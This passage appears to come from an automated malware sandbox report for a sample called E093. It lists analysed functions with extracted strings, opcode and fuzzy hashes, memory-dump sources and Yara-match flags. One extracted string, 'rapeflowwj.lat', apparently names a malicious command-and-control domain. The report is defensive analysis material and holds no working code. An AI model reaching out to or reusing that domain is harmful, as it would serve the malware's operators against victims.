                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                      • Instruction ID: 6193b81f56ff2fad316dd4586d4acbf310bfef3f31fe2c41d47785b3bb80a294
                                                                      • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                      • Instruction Fuzzy Hash: 36918B71A0C3D08BE3358B3984517EBBBD29FE3314F18896DD4D99B782CA754809CB52
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                      • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                      • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                      • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,JHj$Hs$bc$v
                                                                      • API String ID: 0-909542228
                                                                      • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                      • Instruction ID: 38648fff23acc96b4147659c94246fa811dd34feff959ed5223fb238b0221b09
                                                                      • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                      • Instruction Fuzzy Hash: EB814971A083D08BE3348F3584517ABBBD2AFE3304F19895DD4D95B786C675480ACB52
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /G$I$7N1@$Fg)i${\}
                                                                      • API String ID: 0-149357369
                                                                      • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                      • Instruction ID: e7bf53a1dde86597cee4f936ba20256628f06a899fe667193ce6ed1f085d94a3
                                                                      • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                      • Instruction Fuzzy Hash: 4A21B8B551D3809BC314CF66984161BFBE2BBD2704F29A92CF0C85B255D3748902CF8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: ,$i$r}A
                                                                      • API String ID: 2994545307-2114006112
                                                                      • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                      • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                      • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                      • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gfff$i$r}A
                                                                      • API String ID: 0-3931832132
                                                                      • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                      • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                      • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                      • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 34$C]$|F
                                                                      • API String ID: 0-2804560523
                                                                      • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                      • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                      • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                      • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 34$C]$|F
                                                                      • API String ID: 0-2804560523
                                                                      • Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                      • Instruction ID: 53dea7f333ccb0b6e7fd82bb30411bfc3479b94e4c7fb5ad36fb2dc9fdcfa7ad
                                                                      • Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                                                      • Instruction Fuzzy Hash: 04C12EB69093518FC720CF68C88166BB3F6FF95314F18895CE8D58B390E775AA05CB92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Ef$TQ][$sWK)
                                                                      • API String ID: 0-3401374238
                                                                      • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                      • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                      • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                      • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Ef$TQ][$sWK)
                                                                      • API String ID: 0-3401374238
                                                                      • Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                      • Instruction ID: 32680599e5e5945a30bfbbb9a090995fcf94e2a7968b5aee2d7fa76c1de67049
                                                                      • Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
                                                                      • Instruction Fuzzy Hash: E4B1043061D3D08EDB39CF2994907ABBBE49FA7304F08499CD4D95B282D775854ACB63
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +|-~$/pqr$_
                                                                      • API String ID: 0-1379640984
                                                                      • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                      • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                      • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                      • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +|-~$/pqr$_
                                                                      • API String ID: 0-1379640984
                                                                      • Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                      • Instruction ID: 08a415e7fc929938ec81d6733a6c8f635ae6bab8ca05352d3c4144e8aba8340e
                                                                      • Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
                                                                      • Instruction Fuzzy Hash: 43812C5570459006DB2CDF3888A373BBAD6DF84308B2991BEC955CFBA7E938C502874E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NDNK$WJeX$X
                                                                      • API String ID: 0-3631875968
                                                                      • Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                                                      • Instruction ID: 4cb6208b0921dc7e7379c3d5516e93913bd472cf9d0cc0ca26d625591cbcd557
                                                                      • Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
                                                                      • Instruction Fuzzy Hash: D501BCB051D790CFD3B19F259859AAFBFE4AB92310F21492CC5C9AA211DB3688008B03
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Dx$rapeflowwj.lat
                                                                      • API String ID: 0-2060909294
                                                                      • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                      • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                      • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                      • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Dx$rapeflowwj.lat
                                                                      • API String ID: 0-2060909294
                                                                      • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                      • Instruction ID: 255b1b0c01bbc556ed0a41289804d0c38604e2260f8eaedecdce7b332a14b0d6
                                                                      • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                      • Instruction Fuzzy Hash: 80F1CCB050D3D18ED335CF658494BEBBBE1EB92314F144AADC8D99B652C735090ACB93
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0K)$4*VP
                                                                      • API String ID: 0-3626284114
                                                                      • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                      • Instruction ID: ee0fa0f860043fd84ea0c5dc758f82f32c45120ca248bcc29be48a47389392c5
                                                                      • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                      • Instruction Fuzzy Hash: 32D1263061D3D08ED7258B3984507EBBBE59FA7314F1889ADD4C98B382C7798846CB62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0K)$4*VP
                                                                      • API String ID: 0-3626284114
                                                                      • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                      • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                      • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                      • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: i$r}A
                                                                      • API String ID: 2994545307-2976846027
                                                                      • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                      • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                                      • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                      • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P<?$P<?
                                                                      • API String ID: 0-3449142988
                                                                      • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                      • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                                      • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                      • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: f
                                                                      • API String ID: 2994545307-1993550816
                                                                      • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                      • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                                      • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                      • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {}
                                                                      • API String ID: 0-4269290415
                                                                      • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                      • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                      • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                      • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: /,-
                                                                      • API String ID: 2994545307-1700940157
                                                                      • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                      • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                                      • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                      • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /,-
                                                                      • API String ID: 0-1700940157
                                                                      • Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                      • Instruction ID: e7fd073f6dc7a8aefa879a1a5db102a33a3dbdc660a9c0035f1fe5e5a13a301d
                                                                      • Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                      • Instruction Fuzzy Hash: F3B19B7170A3204BD724DF24E881A7BB7A6EBD2314F19893CE585572D9CB31EC06C796
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: VtA
                                                                      • API String ID: 2994545307-3724035812
                                                                      • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                      • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                                      • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                      • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "
                                                                      • API String ID: 0-123907689
                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                      • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                      • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "
                                                                      • API String ID: 0-123907689
                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                      • Instruction ID: e8a3b969a104ceb19484bc98ac0381c26b1d09eee07131c91ebec5adcac452ce
                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                      • Instruction Fuzzy Hash: DA71F832B083598BD714CE2DC4803AEB7E7ABC5760F29C96DE4949B3A1D735DC858B42
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: klm
                                                                      • API String ID: 0-3800403225
                                                                      • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                      • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                                      • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                      • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: klm
                                                                      • API String ID: 0-3800403225
                                                                      • Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                      • Instruction ID: 9ee2d8d6c73610a02f7874173ce3013a1a550a4afda27ba339259507b4367389
                                                                      • Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                      • Instruction Fuzzy Hash: FD51E1B46093508FD714DF64C45276BB7F2FFA6308F18996CE4D68B290E7398901CB1A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: ?^A
                                                                      • API String ID: 2994545307-4120214115
                                                                      • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                      • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                                                      • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                      • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $%
                                                                      • API String ID: 0-4214564638
                                                                      • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                                      • Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
                                                                      • Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                                      • Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $%
                                                                      • API String ID: 0-4214564638
                                                                      • Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
                                                                      • Instruction ID: 68e1449df9d53a8d0a1644074db59ffafe4c53f8f2efc7e31989e2ef175b348a
